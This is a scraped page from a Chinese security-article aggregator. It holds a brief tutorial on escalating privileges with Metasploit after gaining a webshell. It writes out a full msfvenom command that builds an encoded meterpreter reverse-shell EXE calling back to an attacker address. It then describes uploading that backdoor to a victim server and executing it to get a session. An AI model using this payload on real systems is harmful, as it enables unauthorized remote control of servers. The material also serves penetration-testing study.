Quantcast
Channel: CodeSection,代码区,网络安全 - CodeSec
Viewing all articles
Browse latest Browse all 12749

网络安全之用MSF进行提权 网络安全 MSF MSF提权 WEB渗透 system权限

0
0

在WEB渗透中当我们拿到webshell了,我们可以试试用MSF(metasploit)来进行提权,在MSF里meterpreter很强大的!

我们先用msfvenom生成一个EXE的木马后门。

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=192.168.1.7 LPORT=4444 -f exe > abc.exe
网络安全之用MSF进行提权 网络安全 MSF MSF提权 WEB渗透 system权限

然后在到MSF根据刚才配置的木马后门进行监听...

然后在把木马上传到服务器(受害者)的机器里,必须上传到可读可写的目录下哦,


网络安全之用MSF进行提权 网络安全 MSF MSF提权 WEB渗透 system权限

比如这里我吧abc.exe上传到了C:\users\leak\desktop\目录下,

abc.exe就是我刚才生成的后门。


网络安全之用MSF进行提权 网络安全 MSF MSF提权 WEB渗透 system权限
然后在执行我们的后门,可以看见MSF弹回了一个session 1(会话连接)。

Viewing all articles
Browse latest Browse all 12749